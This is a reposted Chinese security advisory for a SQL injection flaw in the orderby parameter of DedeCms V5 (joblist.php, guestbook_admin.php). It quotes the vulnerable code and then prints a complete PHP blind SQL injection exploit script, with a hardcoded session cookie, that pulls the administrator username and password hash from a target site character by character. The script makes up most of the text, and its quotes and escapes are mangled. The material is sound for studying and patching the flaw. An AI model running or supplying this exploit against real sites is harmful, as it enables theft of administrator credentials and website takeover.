欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

DedeCms V5 orderby参数注射漏洞

程序员文章站 2022-06-28 08:57:50
  影响版本:   DedeCms V5漏洞描述:   DedeCms由2004年到现在,已经经历了五个版本,从DedeCms V2 开始,DedeCms开发了自己的模板引擎,使用XML名字空间风格的模板,对美工制作... 11-03-11...

  影响版本:

  dedecms v5漏洞描述:

  dedecms由2004年到现在,已经经历了五个版本,从dedecms v2 开始,dedecms开发了自己的模板引擎,使用xml名字空间风格的模板,对美工制作的直观性提供了极大的便利,从v2.1开始,dedecms人气急却上升,成为国内最流行的cms软件,在dedecms v3版本中,开始引入了模型的概念,从而摆脱里传统网站内容管理对模块太分散,管理不集中的缺点,但随着时间的发展,发现纯粹用模型化并不能满足用户的需求,从而dedecms 2007(dedecms v5)应声而出.80sec在其产品中发现了多个严重的sql注射漏洞,可能被恶意用户查询数据库的敏感信息,如管理员密码,加密key等等,从而控制整个网站。

  在joblist.php和guestbook_admin.php等文件中对orderby参数未做过滤即带入数据库查询,造成多个注射漏洞。漏洞部分代码如下

  -------------------------------------------------------

  if(empty($orderby)) $orderby = 'pubdate';

  //重载列表

  if($dopost=='getlist'){

  printajaxhead();

  getlist($dsql,$pageno,$pagesize,$orderby);//调用getlist函数

  $dsql->close();

  exit();

  ……

  function getlist($dsql,$pageno,$pagesize,$orderby='pubdate'){

  global $cfg_phpurl,$cfg_ml;

  $jobs = array();

  $start = ($pageno-1) * $pagesize;

  $dsql->setquery("select * from sec_jobs where memberid='".$cfg_ml->m_id."' order by $orderby desc limit $start,$pagesize ");

  $dsql->execute();//orderby 带入数据库查询

  ……

  ----------------------------------------------------------

  <*参考

  http://www.80sec.com/dedecms-sql-injection.html

  *>

  测试方法:

  [www.sebug.net]

  本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

  print_r('

  --------------------------------------------------------------------------------

  dedecms >=5 "orderby" blind sql injection/admin credentials disclosure exploit

  by flyh4t

  www.wolvez.org

  thx for all the members of w.s.t and my friend oldjun

  --------------------------------------------------------------------------------

  ');

  if ($argc<3) {

  print_r('

  --------------------------------------------------------------------------------

  usage: php '.$argv[0].’ host path

  host: target server (ip/hostname)

  path: path to dedecms

  example:

  php ‘.$argv[0].’ localhost /

  ——————————————————————————–

  ‘);

  die;

  }

  function sendpacketii($packet)

  {

  global $host, $html;

  $ock=fsockopen(gethostbyname($host),’80′);

  if (!$ock) {

  echo ‘no response from ‘.$host; die;

  }

  fputs($ock,$packet);

  $html=”;

  while (!feof($ock)) {

  $html.=fgets($ock);

  }

  fclose($ock);

  }

  $host=$argv[1];

  $path=$argv[2];

  $prefix=”dede_”;

  $cookie=”dedeuserid=39255; dedeuseridckmd5=31283748c5a4b36c; dedelogintime=1218471600; dedelogintimeckmd5=a7d9577b3b4820fa”;

  if (($path[0]<>’/') or ($path[strlen($path)-1]<>’/'))

  {echo ‘error… check the path!’; die;}

  /*get $prefix*/

  $packet =”get “.$path.”/member/guestbook_admin.php?dopost=getlist&pageno=1&orderby=11′ http/1.0rn”;

  $packet.=”host: “.$host.”rn”;

  $packet.=”cookie: “.$cookie.”rn”;

  $packet.=”connection: closernrn”;

  sendpacketii($packet);

  if (eregi(”in your sql syntax”,$html))

  {

  $temp=explode(”from “,$html);

  $temp2=explode(”member”,$temp[1]);

  if($temp2[0])

  $prefix=$temp2[0];

  echo “[+]prefix -> “.$prefix.”n”;

  }

  $chars[0]=0;//null

  $chars=array_merge($chars,range(48,57)); //numbers

  $chars=array_merge($chars,range(97,102));//a-f letters

  echo “[~]exploting now,plz waitingrn”;

  /*get password*/

  $j=1;$password=”";

  while (!strstr($password,chr(0)))

  {

  for ($i=0; $i<=255; $i++)

  {

  if (in_array($i,$chars))

  {

  $sql=”orderby=11+and+if(ascii(substring((select+pwd+from+”.$prefix.”admin+where+id=1),”.$j.”,1))=”.$i.”,1,(select+pwd+from+”.$prefix.”member))”;

  $packet =”get “.$path.”member/guestbook_admin.php?dopost=getlist&pageno=1&”.$sql.” http/1.0rn”;

  $packet.=”host: “.$host.”rn”;

  $packet.=”cookie: “.$cookie.”rn”;

  $packet.=”connection: closernrn”;

  sendpacketii($packet);

  if (!eregi(”subquery returns more than 1 row”,$html)) {$password.=chr($i);echo”[+]pwd:”.$password.”rn”;break;}

  }

  if ($i==255) {die(”exploit failed…”);}

  }

  $j++;

  }

  /*get userid*/

  $j=1;$admin=”";

  while (!strstr($admin,chr(0)))

  {

  for ($i=0; $i<=255; $i++)

  {

  $sql=”orderby=11+and+if(ascii(substring((select+userid+from+”.$prefix.”admin+where+id=1),”.$j.”,1))=”.$i.”,1,(select+pwd+from+”.$prefix.”member))”;

  $packet =”get “.$path.”member/guestbook_admin.php?dopost=getlist&pageno=1&”.$sql.” http/1.0rn”;

  $packet.=”host: “.$host.”rn”;

  $packet.=”cookie: “.$cookie.”rn”;

  $packet.=”connection: closernrn”;

  sendpacketii($packet);

  if (!eregi(”subquery returns more than 1 row”,$html)) {$admin.=chr($i);echo”[+]userid:”.$admin.”rn”;break;}

  if ($i==255) {die(”exploit failed…”);}

  }

  $j++;

  }

  print_r(’

  ——————————————————————————–

  [+]userid -> ‘.$admin.’

  [+]pwd(md5 24位) -> ‘.$password.’

  ——————————————————————————–

  ‘);

  function is_hash($hash)

  {

  if (ereg(”^[a-f0-9]{24}”,trim($hash))) {return true;}

  else {return false;}

  }

  if (is_hash($password)) {echo “exploit succeeded…”;}

  else {echo “exploit failed…”;}

  ?>爱安全建议:

  暂无

  http://www.dedecms.com// aianquan.com [2008-08-13]

 

(本文由责任编辑 pasu  整理发布)